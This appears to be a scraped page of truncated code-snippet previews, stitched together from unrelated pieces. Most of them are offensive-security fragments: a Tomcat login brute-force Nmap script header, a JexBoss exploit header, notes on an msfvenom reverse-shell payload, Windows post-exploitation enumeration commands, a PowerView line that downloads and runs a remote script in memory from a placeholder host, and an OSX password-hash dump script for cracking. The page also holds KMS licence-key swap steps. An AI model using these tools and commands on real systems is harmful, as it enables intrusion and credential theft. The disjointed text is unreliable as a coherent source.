###To laptop
Specify an IP address to eth0 (here 192.168.56.1)
sudo ifconfig eth0 192.168.56.1 netmask 255.255.255.0
local shortport = require "shortport" | |
local http = require "http" | |
local stdnse = require "stdnse" | |
local brute = require "brute" | |
local creds = require "creds" | |
description = [[ | |
Performs a dictionary/bruteforce attack over login and password fields of Apache Tomcat default web management pages. | |
]] |
#coding: utf-8 | |
''' | |
-------------------------------------------------------------------------------------- | |
# [+] JexBoss v1.0. @autor: João Filho Matos Figueiredo (joaomatosf@gmail.com) | |
# [+] Updates: https://github.com/joaomatosf/jexboss | |
# [+] SCRIPT original: http://1337day.com/exploit/23507 | |
# [+] Free for distribution and modification, but the authorship should be preserved. | |
-------------------------------------------------------------------------------------- | |
[+] SCRIPT Edited by: [ I N U R L - B R A S I L ] - [ By GoogleINURL ] |
Abstract
This is a document explaining how to locate WaitForSingleObject(..., INFINITE)
within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.
Contents:
Windows.10.and.Office.2016.gVLK | |
##################################################################### | |
# Install/Uninstall keys # | |
##################################################################### | |
1.) Uninstall the current product by entering the “uninstall product key” extension: | |
slmgr.vbs /upk | |
2.) Install the key that you obtained above for “Windows Srv 2012R2 DataCtr/Std KMS for Windows 10” |
Open PowerShell (right click > run as Administrator), and enter
Get-AppxPackage *photo* | Remove-AppxPackage
For other apps just replace "photo" with something else.
If you want to look at the list of installed applications just use Get-AppxPackage
,
if you want to copy said list into a program better suited for working with text (eg. has search), just type Get-AppxPackage | clip
Windows version: | |
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion | |
Users who have authed to the system: | |
ls C:\Users\ | |
System env variables: | |
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment | |
Saved outbound RDP connections: |
# Import PowerView into memory without touching disk | |
# IEX (New-Object Net.WebClient).DownloadString('http://HOST/powerview.ps1') | |
################################### | |
# Hunting for Users | |
################################### | |
# search for administrator groups |
#!/usr/bin/python | |
# extracts OSX user hashes and outputs a format crackable with oclHashcat | |
# adapted from http://apple.stackexchange.com/questions/186893/os-x-10-9-where-are-password-hashes-stored | |
# and https://web.archive.org/web/20140703020831/http://www.michaelfairley.co/blog/2014/05/18/how-to-extract-os-x-mavericks-password-hash-for-cracking-with-hashcat/ | |
# | |
# automation of approach by @harmj0y | |
# | |
# sudo ./osx_hashdump.py | |
# ./oclHashcat64.bin -m 7100 hash.txt wordlist.txt |